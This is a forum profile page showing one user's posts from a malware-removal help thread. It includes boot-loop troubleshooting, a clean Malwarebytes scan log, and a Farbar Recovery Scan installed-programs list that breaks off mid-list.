Jump to content

plaggard

Members
  • Posts

    13
  • Joined

  • Last visited

Reputation

0 Neutral
  1. Hey MrC, in the middle of the MalwareBytes threat scan my computer restarted unexpectedly and now I am in an endless "Startup Repair" loop. The OS will not load and the installation disc's repair utilities will not repair the computer. It won't even restore from any of my previous restore points. The best I can do is run command prompt from the disc. Unless you have advice for this situation, I'm going to have to get this sorted out before we continue...
  2. Sorry, I followed your initial instruction and restarted it. Got the black screen again and did a restore. Then restarted again and the login screen came up just fine...
  3. No need to apologize! It was probably my fault some way or another. Here's the new Fixlog. Should I restart the computer like it's asking me to? Fixlog.txt
  4. I had to restore to a point from yesterday because the one from today had that file in it and brought me right back to the BkSOD... So now I'm back to yesterday.
  5. That is the case. Restarting has brought me to the black screen of death. I'll reboot and do a system restore now (just created one a few minutes ago).
  6. Malwarebytes Anti-Malware www.malwarebytes.org Scan Date: 11/4/2014 Scan Time: 10:08:31 AM Logfile: MBAMlog.txt Administrator: Yes Version: 2.00.3.1025 Malware Database: v2014.11.04.03 Rootkit Database: v2014.11.01.02 License: Free Malware Protection: Disabled Malicious Website Protection: Disabled Self-protection: Disabled OS: Windows 7 Service Pack 1 CPU: x64 File System: NTFS User: bcostello Scan Type: Threat Scan Result: Completed Objects Scanned: 559493 Time Elapsed: 5 min, 42 sec Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Disabled Heuristics: Enabled PUP: Enabled PUM: Enabled Processes: 0 (No malicious items detected) Modules: 0 (No malicious items detected) Registry Keys: 0 (No malicious items detected) Registry Values: 0 (No malicious items detected) Registry Data: 0 (No malicious items detected) Folders: 0 (No malicious items detected) Files: 0 (No malicious items detected) Physical Sectors: 0 (No malicious items detected) (end)
  7. Additional scan result of Farbar Recovery Scan Tool (x64) Version: 04-11-2014 Ran by bcostello at 2014-11-04 10:01:38 Running from C:\Users\rbecker\Desktop Boot Mode: Normal ========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: ESET NOD32 Antivirus 4.2 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1} AS: ESET NOD32 Antivirus 4.2 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 64 Bit HP CIO Components Installer (Version: 7.2.4 - Hewlett-Packard) Hidden Adobe Acrobat X Standard - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-BA7E-000000000005}) (Version: 10.1.7 - Adobe Systems) Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated) Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated) Apple Application Support (HKLM-x32\...\{45C56AA7-ED1B-4800-A97F-EDDF3F3520B1}) (Version: 2.3.3 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2F72F540-1F60-4266-9506-952B21D6640D}) (Version: 6.1.0.13 - Apple Inc.) Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) Custom (Version: 01.00.00.002 - Wave Systems Corp.) Hidden D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Dell 1135n Laser MFP (HKLM-x32\...\Dell 1135n Laser MFP) (Version: - DELL Inc.) Dell ControlVault Host Components Installer 64 bit (Version: 2.3.24.1437 - Broadcom Corporation) Hidden Dell Data Protection | Access (HKLM\...\{ABBA2EA4-740E-4052-902B-9CA70B081E3F}) (Version: 2.3.00001.021 - Dell Inc.) Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc) Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 8.1200.101.116 - ALPS ELECTRIC CO., LTD.) Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.54 - Creative Technology Ltd) DellAccess (Version: 01.03.00.046 - Wave Systems Corp.) Hidden Dexterity Shared Components 12.0 (64-bit) (HKLM\...\{E56D868E-684F-4586-AF90-9F46DAC569A2}) (Version: 12.00.0270.000 - Microsoft Corporation) EMBASSY Client Core (Version: 01.03.00.092 - Wave Systems Corp.) Hidden ERAS Connector (Version: 02.09.05.0330 - Wave Systems Corp) Hidden ESET NOD32 Antivirus (HKLM\...\{C5F268F1-0856-43E2-B6F1-2470EEE48D2A}) (Version: 4.2.64.12 - ESET, spol. s r.o.) ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version: - ) Gemalto (Version: 01.64.01.0010 - Wave Systems Corp) Hidden GemPcCCID (Version: 2.0.1 - Gemalto) Hidden HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.232 - SurfRight B.V.) Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation) Intel® Network Connections 16.8.45.00 (HKLM\...\PROSetDX) (Version: 16.8.45.00 - Dell) Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2639 - Intel Corporation) Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.6.245 - Intel Corporation) Intel® WiDi (HKLM\...\{6097158B-0184-4140-BEC3-7885794D2571}) (Version: 3.5.40.0 - Intel Corporation) Intel® Wireless Display (HKLM\...\{28EF7372-9087-4AC3-9B9F-D9751FCDF830}) (Version: - ) Intel® PROSet/Wireless WiFi Software (HKLM\...\{ECE5B218-A086-4E18-A362-D11181681457}) (Version: 15.03.1000.1637 - Intel Corporation) iTunes (HKLM\...\{0225AD21-F3E2-4916-BFF3-65D3F9052582}) (Version: 11.0.2.26 - Apple Inc.) Java 7 Update 55 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417055FF}) (Version: 7.0.550 - Oracle) Java 7 Update 55 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.550 - Oracle) Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden LEGO MINDSTORMS NXT x64 Driver (HKLM\...\{36E6DCFB-9D16-4213-9985-8B68EFEA6019}) (Version: 1.20.140.0 - LEGO) Logitech Solar App 1.10 (HKLM\...\SolarApp) (Version: 1.10.3 - Logitech) Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation) Math Kernel Libraries (64-bit) (Version: 1.0.31.0 - National Instruments) Hidden Math Kernel Libraries (x32 Version: 1.0.31.0 - National Instruments) Hidden Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Camera Codec Pack (HKLM\...\{9DCA0803-0890-4631-94BA-17DE31C49C40}) (Version: 16.4.1734.1104 - Microsoft Corporation) Microsoft Dynamics CRM 2011 for Microsoft Office Outlook (HKLM-x32\...\Microsoft CRM Client) (Version: 5.0.9690.1992 - Microsoft Corporation) Microsoft Lync 2010 SDK Runtime (HKLM-x32\...\{8AF10E19-4330-4077-A1B5-491ACDC24B08}) (Version: 4.0.7577.125 - Microsoft Corporation) Microsoft Lync Web App Plug-in (HKLM\...\{6619085B-A9D5-4DDD-800B-964903EAF546}) (Version: 15.8.8308.726 - Microsoft Corporation) Microsoft Office Professional 2013 - en-us (HKLM\...\ProfessionalRetail - en-us) (Version: 15.0.4659.1001 - Microsoft Corporation) Microsoft Online Services Sign-in Assistant (HKLM\...\{CF2EFAB4-B938-47C6-8426-0FB50D610E92}) (Version: 7.250.4259.0 - Microsoft Corporation) Microsoft ReportViewer 2010 Redistributable (HKLM-x32\...\{C19B3EB6-B54C-3204-A4DF-88432E0C79F7}) (Version: 10.0.30319 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.10411.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft SQL Server 2008 Native Client (HKLM\...\{C79A7EAB-9D6F-4072-8A6D-F8F54957CD93}) (Version: 10.0.1600.22 - Microsoft Corporation) Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{28DA3304-9EC2-4097-BC64-B59A1958841F}) (Version: 3.5.8082.0 - Microsoft Corporation) Microsoft SQL Server Compact 3.5 SP2 x64 ENU (HKLM\...\{F39076D7-7168-44CD-A2C6-EBC1CDA7DC1C}) (Version: 3.5.8082.0 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation) Mozilla Firefox 33.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 33.0.2 (x86 en-US)) (Version: 33.0.2 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 33.0.2 - Mozilla) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) National Instruments Software (HKLM-x32\...\NI Uninstaller) (Version: - National Instruments) NI .NET Framework 4.0 (x32 Version: 4.01.49152 - National Instruments) Hidden NI ActiveX Container (64-bit) (Version: 12.1.3.0 - National Instruments) Hidden NI ActiveX Container (x32 Version: 12.1.3.0 - National Instruments) Hidden NI Assistant Framework (x32 Version: 8.0.112.0 - National Instruments) Hidden NI Assistant Framework 64-bit (Version: 8.0.120.0 - National Instruments) Hidden NI Assistant Framework LabVIEW Code Generator 2012 (x32 Version: 8.0.70.0 - National Instruments) Hidden NI Authentication 12.5.0 (64-bit) (Version: 12.5.199.0 - National Instruments) Hidden NI Authentication 12.5.0 (x32 Version: 12.5.199.0 - National Instruments) Hidden NI CodeSignAPI (x32 Version: 2.70.346 - National Instruments) Hidden NI Curl 12.5.0 (64-bit) (Version: 12.5.197.0 - National Instruments) Hidden NI Curl 12.5.0 (x32 Version: 12.5.197.0 - National Instruments) Hidden NI Customer Experience Improvement Program (x32 Version: 1.1.21.0 - National Instruments) Hidden NI DataSocket 5.0 (64-bit) (Version: 5.0.115.0 - National Instruments) Hidden NI DataSocket 5.0 (x32 Version: 5.0.115.0 - National Instruments) Hidden NI Distributed System Manager 2012 (x32 Version: 12.1.52.0 - National Instruments) Hidden NI DN 2.0 SP1 installer (x32 Version: 2.11.49152 - National Instruments) Hidden NI Error Reporting 2012 (x32 Version: 12.1.54.0 - National Instruments) Hidden NI EulaDepot (x32 Version: 3.30.274 - National Instruments) Hidden NI Example Finder 12.0 (x32 Version: 12.0.291.0 - National Instruments) Hidden NI GMP Windows 32-bit Installer 12.0.0 (x32 Version: 12.0.46.0 - National Instruments) Hidden NI GMP Windows 64-bit Installer 12.0.0 (Version: 12.0.46.0 - National Instruments) Hidden NI Help Assistant 2.0 (64bit) (Version: 2.0.3 - National Instruments) Hidden NI Help Assistant 2.0 (x32 Version: 2.0.3 - National Instruments) Hidden NI Instrument IO Assistant for LabVIEW 2012 32-bit (x32 Version: 1.0.24.0 - National Instruments) Hidden NI LabVIEW 2011 Real-Time NBFifo (x32 Version: 11.0.250.0 - National Instruments) Hidden NI LabVIEW 2012 Help (x32 Version: 12.1.51.0 - National Instruments) Hidden NI LabVIEW 2012 Help File (x32 Version: 12.1.48.0 - National Instruments) Hidden NI LabVIEW 2012 Manuals (x32 Version: 12.1.51.0 - National Instruments) Hidden NI LabVIEW 2012 Real-Time Error Dialog (x32 Version: 12.0.71.0 - National Instruments) Hidden NI LabVIEW 2012 Real-Time NBFifo (x32 Version: 12.0.219.0 - National Instruments) Hidden NI LabVIEW 2012 Run-Time Engine Web Server (x32 Version: 12.5.198.0 - National Instruments) Hidden NI LabVIEW 2012 Scripting Code Generator (x32 Version: 8.0.247.0 - National Instruments) Hidden NI LabVIEW 2012 Search (x32 Version: 12.0.4.0 - National Instruments) Hidden NI LabVIEW 2012 Simulation (x32 Version: 12.0.359.0 - National Instruments) Hidden NI LabVIEW 2012 SP1 (32-bit) (x32 Version: 12.1.104.0 - National Instruments) Hidden NI LabVIEW 2012 SP1 (32-bit) (x32 Version: 12.1.53.0 - National Instruments) Hidden NI LabVIEW 2012 SP1 Deployable License (x32 Version: 12.1.52.0 - National Instruments) Hidden NI LabVIEW 2012 SP1 Deployment Framework (x32 Version: 12.0.463.0 - National Instruments) Hidden NI LabVIEW 2012 SP1 f5 (x32 Version: 12.1.65.0 - National Instruments) Hidden NI LabVIEW 2012 SP1 License (x32 Version: 12.1.52.0 - National Instruments) Hidden NI LabVIEW 2012 SP1 MeasAppChm File (x32 Version: 12.1.51.0 - National Instruments) Hidden NI LabVIEW 2012 SP1 Module for LEGO® MINDSTORMS® (x32 Version: 12.1.310 - National Instruments) Hidden NI LabVIEW 2012 SP1 Run-Time Engine Non-English Support. (x32 Version: 12.1.52.0 - National Instruments) Hidden NI LabVIEW 2012 SP1 Variable Web Service (x32 Version: 12.1.51.0 - National Instruments) Hidden NI LabVIEW 2012 SP1 Web Server (x32 Version: 12.5.198.0 - National Instruments) Hidden NI LabVIEW Broker (64 bit) (Version: 6.8.10.0 - National Instruments) Hidden NI LabVIEW Broker (x32 Version: 6.8.10.0 - National Instruments) Hidden NI LabVIEW C Interface (x32 Version: 1.0.1 - National Instruments) Hidden NI LabVIEW Compare Utility 12.0.0 (x32 Version: 12.1.51.0 - National Instruments) Hidden NI LabVIEW for LEGO MINDSTORMS Mode (x32 Version: 12.1.18.0 - National Instruments) Hidden NI LabVIEW MAX XML (x32 Version: 9.0.6.0 - National Instruments) Hidden NI LabVIEW Merge Utility 2012 SP1 (x32 Version: 12.1.51.0 - National Instruments) Hidden NI LabVIEW Run-Time Engine 2011 SP1 (x32 Version: 11.0.448.0 - National Instruments) Hidden NI LabVIEW Run-Time Engine 2012 SP1 f5 (x32 Version: 12.1.64.0 - National Instruments) Hidden NI LabVIEW Run-Time Engine Interop 2011 (x32 Version: 11.0.449.0 - National Instruments) Hidden NI LabVIEW Run-Time Engine Interop 2012 SP1 (x32 Version: 12.1.64.0 - National Instruments) Hidden NI LabVIEW Toolkit for MINDSTORMS® Competitions 2014-2015 (x32 Version: 14.0.25 - National Instruments) Hidden NI LabVIEW Web Server for Run-Time Engine (x32 Version: 11.0.375.0 - National Instruments) Hidden NI LabVIEW Web Services Runtime (x32 Version: 12.5.128.0 - National Instruments) Hidden NI LabWindows/CVI 2010 LabVIEW DLL Builder (x32 Version: 10.0.0360 - National Instruments) Hidden NI LabWindows/CVI 2010 SP1 Analysis Library (64-bit) (Version: 10.0.1434 - National Instruments) Hidden NI LabWindows/CVI 2010 SP1 Analysis Library (x32 Version: 10.0.1434 - National Instruments) Hidden NI LabWindows/CVI 2010 SP1 Code Generator (x32 Version: 10.0.1434 - National Instruments) Hidden NI LabWindows/CVI 2010 SP1 Low-Level Driver (Original) (x32 Version: 10.0.1434 - National Instruments) Hidden NI LabWindows/CVI 2010 SP1 Low-Level Driver (Updated) (x32 Version: 10.0.1434 - National Instruments) Hidden NI LabWindows/CVI 2010 SP1 Network Variable Library (64-bit) (Version: 10.0.1434 - National Instruments) Hidden NI LabWindows/CVI 2010 SP1 Network Variable Library (x32 Version: 10.0.1434 - National Instruments) Hidden NI LabWindows/CVI 2010 SP1 Run-Time Engine (64-bit) (Version: 10.0.1434 - National Instruments) Hidden NI LabWindows/CVI 2010 SP1 TDM Streaming Library (64-bit) (Version: 10.0.1434 - National Instruments) Hidden NI LabWindows/CVI 2010 SP1 TDM Streaming Library (x32 Version: 10.0.1434 - National Instruments) Hidden NI LabWindows/CVI Run-Time Engine 2010 SP1 (Updated) (x32 Version: 10.0.1434 - National Instruments) Hidden NI LabWindows/CVI Run-Time Engine 2010 SP1 (x32 Version: 10.0.1434 - National Instruments) Hidden NI Launcher (x32 Version: 3.11.177 - National Instruments) Hidden NI License Manager (x32 Version: 3.7.50 - National Instruments) Hidden NI Logos 5.4 (64-bit) (Version: 5.4.350.0 - National Instruments) Hidden NI Logos 5.4 (x32 Version: 5.4.350.0 - National Instruments) Hidden NI Logos LabVIEW 2012 Support (x32 Version: 12.1.51.0 - National Instruments) Hidden NI Logos XT Support (x32 Version: 5.4.342.0 - National Instruments) Hidden NI Logos64 XT Support (Version: 5.4.342.0 - National Instruments) Hidden NI Math Kernel Libraries (64-bit) (Version: 1.0.10.0 - National Instruments) Hidden NI Math Kernel Libraries (x32 Version: 1.0.10.0 - National Instruments) Hidden NI MAX Remote Configuration 64-bit Installer 5.4 (Version: 5.40.49152 - National Instruments) Hidden NI MAX Remote Configuration Installer 5.4 (x32 Version: 5.40.49152 - National Instruments) Hidden NI MAX Support for 64 Bit Windows (Version: 5.40.49152 - National Instruments) Hidden NI MDF Support (x32 Version: 3.30.274 - National Instruments) Hidden NI mDNS Responder 2.1.1 (x32 Version: 2.11.49152 - National Instruments) Hidden NI mDNS Responder 2.1.1 for Windows 64-bit (Version: 2.11.49152 - National Instruments) Hidden NI Measurement & Automation Explorer 5.4.0 (x32 Version: 5.40.49152 - National Instruments) Hidden NI Measurement Studio ComponentWorks 3D Graph (x32 Version: 8.6.10603 - National Instruments) Hidden NI Measurement Studio Recipe Processor (x32 Version: 8.0.0101 - National Instruments) Hidden NI MetaSuite Installer (x32 Version: 3.11.171 - National Instruments) Hidden NI MXS 5.4.0 (x32 Version: 5.40.49152 - National Instruments) Hidden NI MXS 5.4.0 for 64 Bit Windows (Version: 5.40.49152 - National Instruments) Hidden NI Network Discovery 5.4 (x32 Version: 5.40.49152 - National Instruments) Hidden NI Network Discovery 5.4 for Windows 64-bit (Version: 5.40.49152 - National Instruments) Hidden NI NI LabVIEW 2011 SP1 Run-Time Engine Non-English Support (x32 Version: 11.0.302.0 - National Instruments) Hidden NI OPC Support (x32 Version: 12.0.295.0 - National Instruments) Hidden NI Portable Configuration 5.3.0 (x32 Version: 5.30.49152 - National Instruments) Hidden NI Portable Configuration for 64 Bit Windows 5.3.0 (Version: 5.30.49152 - National Instruments) Hidden NI Registration Wizard (x32 Version: 1.3.94.0 - National Instruments) Hidden NI Remote Provider for MAX 5.4.0 (x32 Version: 5.40.49152 - National Instruments) Hidden NI Remote PXI Provider for MAX 5.3.0 (x32 Version: 5.30.49152 - National Instruments) Hidden NI Search Shared (x32 Version: 12.0.5.0 - National Instruments) Hidden NI Security Update (KB 67L8LCQW) (64-bit) (Version: 1.0.29.0 - National Instruments) Hidden NI Security Update (KB 67L8LCQW) (x32 Version: 1.0.29.0 - National Instruments) Hidden NI Security Update (KB67L8LIQW) (x32 Version: 8.6.10500 - National Instruments) Hidden NI SLCP 1.0 (x32 Version: 1.0.63.0 - National Instruments) Hidden NI Software Provider for MAX 5.3.0 (x32 Version: 5.30.49152 - National Instruments) Hidden NI SSL LabVIEW 2012 SP1 Support (x32 Version: 12.5.198.0 - National Instruments) Hidden NI SSL LabVIEW RTE 2012 SP1 Support (x32 Version: 12.5.8.0 - National Instruments) Hidden NI SSL Support (64-bit) (Version: 12.5.199.0 - National Instruments) Hidden NI SSL Support (x32 Version: 12.5.199.0 - National Instruments) Hidden NI System API Client for WIF 5.4.0 (x32 Version: 5.40.215.0 - National Instruments) Hidden NI System API Web-Servce 32-bit 5.4.0 (x32 Version: 5.40.236.0 - National Instruments) Hidden NI System API Windows 32-bit 5.4.0 (x32 Version: 5.40.220.0 - National Instruments) Hidden NI System API Windows 64-bit 5.4.0 (Version: 5.40.220.0 - National Instruments) Hidden NI System Configuration 5.4.0 LabVIEW Support (x32 Version: 5.40.79.0 - National Instruments) Hidden NI System Configuration LV2012 Support 5.4.0 (x32 Version: 5.40.76.0 - National Instruments) Hidden NI System Configuration Runtime 5.4.0 (x32 Version: 5.40.108.0 - National Instruments) Hidden NI System Configuration Runtime 5.4.0 for Windows 64-bit (Version: 5.40.108.0 - National Instruments) Hidden NI System State Publisher (64-bit) (Version: 12.1.46.0 - National Instruments) Hidden NI System State Publisher (x32 Version: 12.0.446.0 - National Instruments) Hidden NI System Web Server 12.0 (x32 Version: 12.5.199.0 - National Instruments) Hidden NI System Web Server Base 12.5.0 (64-bit) (Version: 12.5.198.0 - National Instruments) Hidden NI System Web Server Base 12.5.0 (x32 Version: 12.5.198.0 - National Instruments) Hidden NI TDM Excel Add-In 3.4 (x32 Version: 3.4.19.0 - National Instruments) Hidden NI TDM Excel Add-In 3.4 64-bit (Version: 3.4.19.0 - National Instruments) Hidden NI TDM Streaming 2.4 (64-bit) (Version: 2.4.55.0 - National Instruments) Hidden NI TDM Streaming 2.4 (x32 Version: 2.4.55.0 - National Instruments) Hidden NI Trace Engine (64-bit) (Version: 12.0.401.0 - National Instruments) Hidden NI Trace Engine (x32 Version: 12.0.401.0 - National Instruments) Hidden NI Uninstaller (x32 Version: 3.30.274 - National Instruments) Hidden NI Update Service 2.2.5 (x32 Version: 2.25.79 - National Instruments) Hidden NI USI 2.0.0 (x32 Version: 2.0.04901 - National Instruments) Hidden NI USI 2.0.0 64-Bit (Version: 2.0.04901 - National Instruments) Hidden NI Variable Engine (64-bit) (Version: 2.6.296.0 - National Instruments) Hidden NI Variable Engine 2.6.0 (x32 Version: 2.6.296.0 - National Instruments) Hidden NI Variable Engine LabVIEW 2012 Support (x32 Version: 12.1.51.0 - National Instruments) Hidden NI VC2005MSMs x64 (Version: 8.05.0 - National Instruments) Hidden NI VC2005MSMs x86 (x32 Version: 8.05.0 - National Instruments) Hidden NI VC2008MSMs x64 (Version: 9.0.401 - National Instruments) Hidden NI VC2008MSMs x86 (x32 Version: 9.0.401 - National Instruments) Hidden NI VC2010SP1MSMs x64 (Version: 10.0.100 - National Instruments) Hidden NI VC2010SP1MSMs x86 (x32 Version: 10.0.100 - National Instruments) Hidden NI VIPM Helper 2012 (x32 Version: 12.0.211.0 - National Instruments) Hidden NI Web Application Server 12.0 (64-bit) (Version: 12.5.198.0 - National Instruments) Hidden NI Web Application Server 12.0 (x32 Version: 12.5.198.0 - National Instruments) Hidden NI Web Interface Framework 2012 (x32 Version: 12.5.138.0 - National Instruments) Hidden NI Web Pipeline 2.0.1 (x32 Version: 2.0.128.0 - National Instruments) Hidden NI Web Pipeline 2.0.1 64-bit support (Version: 2.0.122.0 - National Instruments) Hidden NI Xalan Delay Load 1.10.2 (x32 Version: 1.10.72.0 - National Instruments) Hidden NI Xalan Delay Load 1.10.2 64-bit (Version: 1.10.73.0 - National Instruments) Hidden NI Xerces Delay Load 2.7.3 (x32 Version: 2.7.180.0 - National Instruments) Hidden NI Xerces Delay Load 2.7.3 64-bit (Version: 2.7.190.0 - National Instruments) Hidden NI-DAQmx/LabVIEW shared documentation 9.5.5 (x32 Version: 9.55.49152 - National Instruments) Hidden NI-DAQmx/LabVIEW shared documentation for 64 Bit Windows 9.5.5 (Version: 9.55.49152 - National Instruments) Hidden Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon) Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.7.0 - Nikon) NI-Mesa (Version: 11.0.11.0 - National Instruments) Hidden NI-Mesa (x32 Version: 11.0.11.0 - National Instruments) Hidden NI-RPC 4.3.0f0 (x32 Version: 4.30.49152 - National Instruments) Hidden NI-RPC 4.3.0f0 for 64 Bit Windows (Version: 4.30.49152 - National Instruments) Hidden NI-RPC 4.3.0f0 for Phar Lap ETS (x32 Version: 4.30.49152 - National Instruments) Hidden NVIDIA Graphics Driver 327.62 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 327.62 - NVIDIA Corporation) NVIDIA HD Audio Driver 1.3.26.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.26.4 - NVIDIA Corporation) NVIDIA nView 140.75 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NView) (Version: 140.75 - NVIDIA Corporation) Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4659.1001 - Microsoft Corporation) Hidden Office 15 Click-to-Run Licensing Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4659.1001 - Microsoft Corporation) Hidden Open XML SDK 2.0 for Microsoft Office (HKLM-x32\...\{171D8D76-3F05-455A-A8AF-C561C2679905}) (Version: 2.0.5022 - Microsoft Corporation) PBA Driver (Version: 1.0.1.7 - Dell Inc.) Hidden Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.4.11 - Nikon) Preboot Manager (Version: 03.05.00.026 - Wave Systems Corp.) Hidden Private Information Manager (Version: 07.03.00.016 - Wave Systems Corp.) Hidden RDp version 12.10.0 (HKLM-x32\...\{F2151451-7715-4671-9044-3B9EE0AA4D7D}_is1) (Version: 12.10.0 - JacobLis.com) Readiris Pro 10 (HKLM-x32\...\{14D08502-FEE4-40E5-90D3-8A967A1D8BA2}) (Version: - ) Reset NI Config 5.0.0 (x32 Version: 5.0.146.0 - National Instruments) Hidden SI TSS (Version: 2.1.41 - Security Innovation) Hidden SmarThru 4 (HKLM-x32\...\{90F1943D-EA4A-4460-B59F-30023F3BA69A}) (Version: - ) SmarThru PC Fax (HKLM-x32\...\SmarThru PC Fax) (Version: - ) SolidWorks Enterprise PDM (HKLM\...\{96E13B88-4AC5-40CD-8435-8C2BD057C001}) (Version: 14.02.0714 - SolidWorks Corporation) SPBA (WBF) 5.9 (Version: 5.9.7.7232 - Authentec Inc.) Hidden ST Microelectronics 3 Axis Digital Accelerometer Solution (HKLM-x32\...\{9C24F411-9CA7-4A8A-91F3-F08A4A38EB31}) (Version: 4.10.0030 - ST Microelectronics) TeamViewer 6 Host (HKLM-x32\...\TeamViewer 6 Host) (Version: 6.0.10722 - TeamViewer GmbH) Time Clock version 12.11.0 (HKLM-x32\...\{8B4F8277-D2D7-44F1-B5DF-F4F5C87CABF6}_is1) (Version: 12.11.0 - Jacob Liscom) toolkit32for64bit (x32 Version: 7.68.85.0013 - Wave Systems Corp) Hidden Trusted Drive Manager (Version: 5.0.0.304 - Wave Systems Corp.) Hidden UFR II Printer Driver Uninstaller (HKLM\...\Canon UFR II Printer Driver) (Version: 6, 1, 0, 0 - Canon Inc.) Update Rollup 6 for Microsoft Dynamics CRM for Outlook (KB2600640) (HKLM-x32\...\KB2600640_Client_1033) (Version: 5.0.9690.1992 - Microsoft Corporation) ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.7.4 - Nikon) Wave Crypto Runtime 2.0.9.0 x64 (Version: 02.00.09.0000 - Wave Systems Corp) Hidden Wave Crypto Runtime 2.0.9.0 x86 (x32 Version: 02.00.09.0000 - Wave Systems Corp) Hidden Wave Infrastructure Installer (Version: 07.68.85.0014 - Wave Systems Corp) Hidden Wave Support Software Installer (Version: 05.15.00.021 - Wave Systems Corp) Hidden WebEx Productivity Tools (HKLM-x32\...\{A19738DD-B398-415F-8A61-40C724A6A73A}) (Version: 2.1.1400 - Cisco WebEx LLC) WIF Core Dependencies Windows 5.4.0 (x32 Version: 5.40.69.0 - National Instruments) Hidden Windows Driver Package - Leapfrog (Leapfrog-USBLAN) Net (09/10/2009 02.03.05.012) (HKLM\...\8F14F2ECEDE68D26EA515B48DC25B39103C4FE8D) (Version: 09/10/2009 02.03.05.012 - Leapfrog) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 